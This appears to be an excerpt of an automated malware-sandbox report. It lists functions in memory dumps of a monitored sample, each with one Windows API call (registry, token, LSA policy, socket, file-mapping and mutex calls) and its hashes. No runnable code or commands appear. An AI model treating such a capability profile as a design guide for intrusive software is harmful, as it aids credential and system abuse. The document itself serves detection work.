                                                                      • RegQueryValueExW.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 0107ACD8
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 78f89ee3698fbe85839630c7d8f4e3d7b29c211d3bf37c8469b2ac359d600322
                                                                      • Instruction ID: 637e1beb8273ab04cd2deb5d55712c71d77ea8f3b868473c2739b87b99bf475e
                                                                      • Opcode Fuzzy Hash: 78f89ee3698fbe85839630c7d8f4e3d7b29c211d3bf37c8469b2ac359d600322
                                                                      • Instruction Fuzzy Hash: 23318172505384AFE722CF25CC45F66BFE8EF06310F18849AE9858B253D264E949CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD05CC, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 528f387b7cbe1e61613bab44ab3fa91844bff6ecd305f4479254497858392dee
                                                                      • Instruction ID: 4fd64afc0c94c2bd2754774ed2e027ea2cbd27eb5f0c192c6158abedf7d682d9
                                                                      • Opcode Fuzzy Hash: 528f387b7cbe1e61613bab44ab3fa91844bff6ecd305f4479254497858392dee
                                                                      • Instruction Fuzzy Hash: 9831F6B2404780AFE722CF14DC44F96FFF8EF06320F08859AE9849B252D374A909CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107AFCF, Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 0107B06C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationToken
                                                                      • String ID:
                                                                      • API String ID: 4114910276-0
                                                                      • Opcode ID: 78f53010e4620c8e018b776e45914db86585376aee2fdc5bd0f221e573eb64b8
                                                                      • Instruction ID: aedc55a6e584343ad1180a70dda894fb0c69db0a205acd4619692f3306747db8
                                                                      • Opcode Fuzzy Hash: 78f53010e4620c8e018b776e45914db86585376aee2fdc5bd0f221e573eb64b8
                                                                      • Instruction Fuzzy Hash: FD318172509384AFE7128B25DC55F97BFB8EF06310F0884ABE985DB153D264A908C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107B2F3, Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 0107B38F
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: OpenPolicy
                                                                      • String ID:
                                                                      • API String ID: 2030686058-0
                                                                      • Opcode ID: b7f7fe6664747135fabb486d96beddda465b2536c7c587b29ba5ac4ef4470158
                                                                      • Instruction ID: 10ccc87a8c92a9e0c8205b4a58f0aefadc2f5b19f6c604f269e0b5757861c56b
                                                                      • Opcode Fuzzy Hash: b7f7fe6664747135fabb486d96beddda465b2536c7c587b29ba5ac4ef4470158
                                                                      • Instruction Fuzzy Hash: 39219172504344AFE721CF64DC84F6ABFE8EF46310F08849AED849B252D264A848CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD0959, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateMutexW.KERNELBASE(?,?), ref: 04FD09F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateMutex
                                                                      • String ID:
                                                                      • API String ID: 1964310414-0
                                                                      • Opcode ID: f89e8e5e0044d0a9723955a56f5ca19ea1e431b5e2e5bc55dfb2e45810ec0ca2
                                                                      • Instruction ID: 3cf3a3c8c03f500c96d5006c60b554641b402d3e6891e634b723ef8d413305ad
                                                                      • Opcode Fuzzy Hash: f89e8e5e0044d0a9723955a56f5ca19ea1e431b5e2e5bc55dfb2e45810ec0ca2
                                                                      • Instruction Fuzzy Hash: 453173B1509380AFE712CF65CC85F56FFE8EF45310F08849AE9889B292D375E905CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107A120, Relevance: 1.6, APIs: 1, Instructions: 83networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAStartup.WS2_32(?,00000E2C,?,?), ref: 0107A1BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Startup
                                                                      • String ID:
                                                                      • API String ID: 724789610-0
                                                                      • Opcode ID: 2ced33e4e1f08e543ab5a035bb8f74d8fcd46c3ff068f9163b24be18586bc72c
                                                                      • Instruction ID: c9c71b2b58a7627f006ab6d6c74f7058f89d69182630e149bf4f4f5222f2559e
                                                                      • Opcode Fuzzy Hash: 2ced33e4e1f08e543ab5a035bb8f74d8fcd46c3ff068f9163b24be18586bc72c
                                                                      • Instruction Fuzzy Hash: F931D37140D3C06FD7028B758C55B66BFB4EF87620F1981DBD9848F1A3D229A919CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD2ED7, Relevance: 1.6, APIs: 1, Instructions: 83fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CopyFileW.KERNELBASE(?,?,?), ref: 04FD2F72
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CopyFile
                                                                      • String ID:
                                                                      • API String ID: 1304948518-0
                                                                      • Opcode ID: 52d2b7c81e40a21867545a1de1fa0d179b7c6c57f682b1d51b42d3ceab2c0b57
                                                                      • Instruction ID: 2145d71a8e828d96e03fc5ef43f4419cea4706518a81d389c0f79a65235bc638
                                                                      • Opcode Fuzzy Hash: 52d2b7c81e40a21867545a1de1fa0d179b7c6c57f682b1d51b42d3ceab2c0b57
                                                                      • Instruction Fuzzy Hash: 7A3118715093C09FE7128B25CC55B52BFB8AF47210F0984DAE984CB293D665A849DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD14E9, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 04FD1596
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFileMapping
                                                                      • String ID:
                                                                      • API String ID: 524692379-0
                                                                      • Opcode ID: 1037f4fbc4ae0c6469bebaa6ae139e73ae64c248c16c349c8b93df2f9243cc84
                                                                      • Instruction ID: 0a2be90205f6a18c6adc7475fb89bc101394beb714659033084b0710938fbcb6
                                                                      • Opcode Fuzzy Hash: 1037f4fbc4ae0c6469bebaa6ae139e73ae64c248c16c349c8b93df2f9243cc84
                                                                      • Instruction Fuzzy Hash: BC3180725093C06FD3138B25DC55B62BFB8EF87610F1A81DBE8848B553D264A919C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD0D42, Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,00000E2C), ref: 04FD0DBF
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 5df566a45310bbc2d4415b742b66efb06d709ff9fc7df4bddc3eaff24d504cfc
                                                                      • Instruction ID: 32f94e56af677103bf918671c6f10be1761c71626b6f8e0771560e83b494c206
                                                                      • Opcode Fuzzy Hash: 5df566a45310bbc2d4415b742b66efb06d709ff9fc7df4bddc3eaff24d504cfc
                                                                      • Instruction Fuzzy Hash: 1D21AF72500304AFEB219F65DC44FABFBACEF04320F18896BEE459B251D674A4198B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD1343, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAEventSelect.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD13D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EventSelect
                                                                      • String ID:
                                                                      • API String ID: 31538577-0
                                                                      • Opcode ID: df01c4ef02289d07ab4737137c6c8f3fa0ccbae5c9d71c96cf15b3319723449e
                                                                      • Instruction ID: add03c3037691712fda23655dcbf10075884ce660b2a74bbbe729de076d394ba
                                                                      • Opcode Fuzzy Hash: df01c4ef02289d07ab4737137c6c8f3fa0ccbae5c9d71c96cf15b3319723449e
                                                                      • Instruction Fuzzy Hash: 63218172509384AFE7128F65CC44F97BFB8EF46310F0884ABEA84DB152D224A509C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD0006, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • setsockopt.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD0091
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: a80b1ebabf740a0689cb68e2c2bf9b3b97dc3013a56759abacf37436fdcf4195
                                                                      • Instruction ID: 94f74501940837776bd7ac489f6fcfe2fd8e880f2a9e2a31f947b140865b961c
                                                                      • Opcode Fuzzy Hash: a80b1ebabf740a0689cb68e2c2bf9b3b97dc3013a56759abacf37436fdcf4195
                                                                      • Instruction Fuzzy Hash: 1C21A172409380BFEB228F65DC44F66BFB8EF46314F08849BEA849B152C265A909C771
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107BD00, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileType.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 0107BD95
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID:
                                                                      • API String ID: 3081899298-0
                                                                      • Opcode ID: 4a513e28cd2041b65967c947ddf7d48992d148b01205d287be30ac8a61b01393
                                                                      • Instruction ID: 6464a9cfd1a19f674c8e212d8d758abe56b35988ba478204256b6a47a36f31ec
                                                                      • Opcode Fuzzy Hash: 4a513e28cd2041b65967c947ddf7d48992d148b01205d287be30ac8a61b01393
                                                                      • Instruction Fuzzy Hash: 5821F8B64087846FE7138B25DC40FA6BFA8EF47720F1880DBED849B153D264A905C775
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD04EA, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenFileMappingW.KERNELBASE(?,?), ref: 04FD0575
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileMappingOpen
                                                                      • String ID:
                                                                      • API String ID: 1680863896-0
                                                                      • Opcode ID: 8f73648d40f23a7c73e2b4ca607aa09d73e4c1da3fa43f80a4b8308c6e512e1e
                                                                      • Instruction ID: b05e2968181a9034735ed5107fc562a4e73c37d3a7776e4357ca200844b96b7d
                                                                      • Opcode Fuzzy Hash: 8f73648d40f23a7c73e2b4ca607aa09d73e4c1da3fa43f80a4b8308c6e512e1e
                                                                      • Instruction Fuzzy Hash: DD219FB1505380AFE721CF65CC44F66FFA8EF46210F08849AED859B252D375E949CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107B82E, Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSASocketW.WS2_32(?,?,?,?,?), ref: 0107B8BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Socket
                                                                      • String ID:
                                                                      • API String ID: 38366605-0
                                                                      • Opcode ID: 44bbf6f656a5a4f403839e1a496fcbc7707be8948dff7ce23aa5696d50ef044b
                                                                      • Instruction ID: 2bbb1b5301ad933a5aefa2fb39a63fe09885e4455f02ff7fca8894c8d20b7179
                                                                      • Opcode Fuzzy Hash: 44bbf6f656a5a4f403839e1a496fcbc7707be8948dff7ce23aa5696d50ef044b
                                                                      • Instruction Fuzzy Hash: A321BF72408380AFE722CF65DC44F96FFF8EF05210F08849EEA859B252C375A808CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107BC2A, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0107BCA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 088b81756c82e66f7c4f752571b8362b11832ce5f2e671be890cff752f1a7424
                                                                      • Instruction ID: 1dba1b9f6130390c2122908cecb21ac57834a3329ce58d5cc134c1c9303d77ac
                                                                      • Opcode Fuzzy Hash: 088b81756c82e66f7c4f752571b8362b11832ce5f2e671be890cff752f1a7424
                                                                      • Instruction Fuzzy Hash: B9216B71900604AFEB21DF69C945B66FBE8EF04610F1484AAEE858B252D771E404CB75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD024E, Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD02E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 5fe7b4c518403842180274fe76ee6ca3ced0e36147f41a0269e01a3796e44703
                                                                      • Instruction ID: 471fff58b611040bf40589b3374795e3969befa886f455d56a7f95c2e7e9a077
                                                                      • Opcode Fuzzy Hash: 5fe7b4c518403842180274fe76ee6ca3ced0e36147f41a0269e01a3796e44703
                                                                      • Instruction Fuzzy Hash: 5E219A72505344AFE722CF65CC44F57FFF8EF0A310F08849AEA859B252D264E809CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107AB56, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0107ABD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: f0d1c5627319039d22dc912adf833c4ad3fcae1372dac755595a5bea3ec15f9e
                                                                      • Instruction ID: 31197db07b7d244952658e36c331fbc53244b6355a854906f71f96ee95e59be2
                                                                      • Opcode Fuzzy Hash: f0d1c5627319039d22dc912adf833c4ad3fcae1372dac755595a5bea3ec15f9e
                                                                      • Instruction Fuzzy Hash: 12219272500604EFE7219F19CC44F6BFBECEF04710F14845BEE459B242D664A4088B75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD1085, Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getsockname.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD110B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getsockname
                                                                      • String ID:
                                                                      • API String ID: 3358416759-0
                                                                      • Opcode ID: 2e389a9e01a058c77297a1a6b08f840465e2553e86a65e04127fbf937b225f14
                                                                      • Instruction ID: fe9c83948cea5aa1e6dd14a1057f2c297dd4b301b920c571b3c89952fc766fc3
                                                                      • Opcode Fuzzy Hash: 2e389a9e01a058c77297a1a6b08f840465e2553e86a65e04127fbf937b225f14
                                                                      • Instruction Fuzzy Hash: 7821B072508384AFE712CF65DD44F97BFACEF46310F0884ABEA449B252C264A908CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107B31E, Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 0107B38F
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: OpenPolicy
                                                                      • String ID:
                                                                      • API String ID: 2030686058-0
                                                                      • Opcode ID: 3fd39cfe08476dcd82f75ed1a33253d71efa27ef55439505f13be50d30adc4bf
                                                                      • Instruction ID: a6c75a6dc3b56e65933ba91342650baf1d78f801c099b3ba13404f5078459c8c
                                                                      • Opcode Fuzzy Hash: 3fd39cfe08476dcd82f75ed1a33253d71efa27ef55439505f13be50d30adc4bf
                                                                      • Instruction Fuzzy Hash: 5C21AE72900204AFEB21DF68DC85F6AFBECEF44710F14886AEE84DA241D674A4488B75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD0986, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateMutexW.KERNELBASE(?,?), ref: 04FD09F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateMutex
                                                                      • String ID:
                                                                      • API String ID: 1964310414-0
                                                                      • Opcode ID: 7cfb81d8f6c2cf0c5531b0f04b4e77e05fbdc2d3fd1e5c247828a0de578bd8b9
                                                                      • Instruction ID: de7e9a65dab52551062174504d00015508802404db153455fd876ffca001b9e1
                                                                      • Opcode Fuzzy Hash: 7cfb81d8f6c2cf0c5531b0f04b4e77e05fbdc2d3fd1e5c247828a0de578bd8b9
                                                                      • Instruction Fuzzy Hash: 22218E71600204AFF720DF65CC85B6AFBE8EF04714F18846AEE489B242D775E805CB76
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD1169, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ioctlsocket.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD11E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ioctlsocket
                                                                      • String ID:
                                                                      • API String ID: 3577187118-0
                                                                      • Opcode ID: 9de5f3426e08ca8ba5ef3b4e4250a7c0f53c0fb75affd1fe03ceeb2d2d09b238
                                                                      • Instruction ID: 163aae3b073cab49f0fda9821f9c297afdd2fe252a9d6e6ea38b91135fd76355
                                                                      • Opcode Fuzzy Hash: 9de5f3426e08ca8ba5ef3b4e4250a7c0f53c0fb75affd1fe03ceeb2d2d09b238
                                                                      • Instruction Fuzzy Hash: 41219372409384AFEB12CF65DC44F5AFFB8EF46310F0884ABEA849F152D275A509C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107B002, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 0107B06C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationToken
                                                                      • String ID:
                                                                      • API String ID: 4114910276-0
                                                                      • Opcode ID: fcc2eaf251e687eec02c61d4be44992f5a5c5497c32e7c08b0c0ee3eee322176
                                                                      • Instruction ID: 4f7853524e85859da9dbd373a257ce05c6b75021ac81cd3387d9ea6f77940095
                                                                      • Opcode Fuzzy Hash: fcc2eaf251e687eec02c61d4be44992f5a5c5497c32e7c08b0c0ee3eee322176
                                                                      • Instruction Fuzzy Hash: 53119072500204AFEB228F65DC84FABBBACEF05320F14846BEE45DB251D674A5088BB5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107AC5E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 0107ACD8
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 1851a548197bb75f2fea25063eb39a705625fb40de2682f86f9e10ce79fe85cd
                                                                      • Instruction ID: 85d6f6077ae0a898f182de3c5b5b32bf3c55d40fe4e1a04763b8e87fbfb1417c
                                                                      • Opcode Fuzzy Hash: 1851a548197bb75f2fea25063eb39a705625fb40de2682f86f9e10ce79fe85cd
                                                                      • Instruction Fuzzy Hash: AD218E71600608EFE720DF19CC81F6BBBECEF04710F0884AAEA859B251D660E808CA75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107B913, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • setsockopt.WS2_32(?,?,?,?,?), ref: 0107B990
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: c8106c5ae39afc03f5d9b8dd82d1da93d69e4a35d1c7d746c43092ca5133757e
                                                                      • Instruction ID: 3521044bbf09eff662cf605cca0ac9b5c913579d911391b37ab84dad71cd272b
                                                                      • Opcode Fuzzy Hash: c8106c5ae39afc03f5d9b8dd82d1da93d69e4a35d1c7d746c43092ca5133757e
                                                                      • Instruction Fuzzy Hash: 68219A324093C0AFDB128F65DC44A96BFB4EF07320F1985DAD9C48F163C235A849DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD126A, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: accept
                                                                      • String ID:
                                                                      • API String ID: 3005279540-0
                                                                      • Opcode ID: 16176d5baa6a223d0de7d803c5cd9ce106dc056819eda6f4ce8a9e71fabed3ca
                                                                      • Instruction ID: 1906d90e74397d775593b7cde46ddfb7d52c6d3870a0e3c6c91d4ec47256b473
                                                                      • Opcode Fuzzy Hash: 16176d5baa6a223d0de7d803c5cd9ce106dc056819eda6f4ce8a9e71fabed3ca
                                                                      • Instruction Fuzzy Hash: 5C21C371500240AFE720DF25DD85FAAFBE8EF04310F18846AEE849B241D375B909CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD050A, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenFileMappingW.KERNELBASE(?,?), ref: 04FD0575
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileMappingOpen
                                                                      • String ID:
                                                                      • API String ID: 1680863896-0
                                                                      • Opcode ID: cbef10c1c4a537c36bf4950277e56fb1ed39fd9f982e401dfd7c160599c1949e
                                                                      • Instruction ID: d9851201bd9d2f1ebfacc768786b90a51d94eba9b6d76d92ab43c9d0a4158aec
                                                                      • Opcode Fuzzy Hash: cbef10c1c4a537c36bf4950277e56fb1ed39fd9f982e401dfd7c160599c1949e
                                                                      • Instruction Fuzzy Hash: 8621AEB1900200AFE720DF25DC45B66FBE8EF05324F18846AED858B241D775F805CB75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107B84E, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSASocketW.WS2_32(?,?,?,?,?), ref: 0107B8BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Socket
                                                                      • String ID:
                                                                      • API String ID: 38366605-0
                                                                      • Opcode ID: 1b4921be4f06a5c786f2e8aa407f1c05b04c763aee62098e6c54305ed38d8d7f
                                                                      • Instruction ID: 7a8a98b3c32cd0d8f29b948a67d5c2db8c283855a415d5f76c6dee8830b6a673
                                                                      • Opcode Fuzzy Hash: 1b4921be4f06a5c786f2e8aa407f1c05b04c763aee62098e6c54305ed38d8d7f
                                                                      • Instruction Fuzzy Hash: 2321CD71900200AFEB21DF65DC44B6AFFE8EF08320F14846AEE858A252C3B1A408CB75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD060A, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 026e818f493751cd3f14994105a81f5680a924ee0d206a43130ec22be7670a14
                                                                      • Instruction ID: abd63c70bec3ddf9910e1da29a0cb1a708f3e87c534c624a711c58112315e8d8
                                                                      • Opcode Fuzzy Hash: 026e818f493751cd3f14994105a81f5680a924ee0d206a43130ec22be7670a14
                                                                      • Instruction Fuzzy Hash: B621AE72500204AFE721DF15DC84F9AFFE8EF48324F14845AEA849B251D7B5B509CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD1B95, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04FD1C11
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoadShim
                                                                      • String ID:
                                                                      • API String ID: 1475914169-0
                                                                      • Opcode ID: e3595497474b0fc2c413d7e8e147f4ea0eaec15b44f33a81376be0b212443679
                                                                      • Instruction ID: 6c8ac15fcd5b698e500a90283bd1a643b110e765b30bf5016d5691af02cc315d
                                                                      • Opcode Fuzzy Hash: e3595497474b0fc2c413d7e8e147f4ea0eaec15b44f33a81376be0b212443679
                                                                      • Instruction Fuzzy Hash: 222193B55093845FD7228F15DD44B62BFE8EF06314F0D808AED848B253D265A909C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

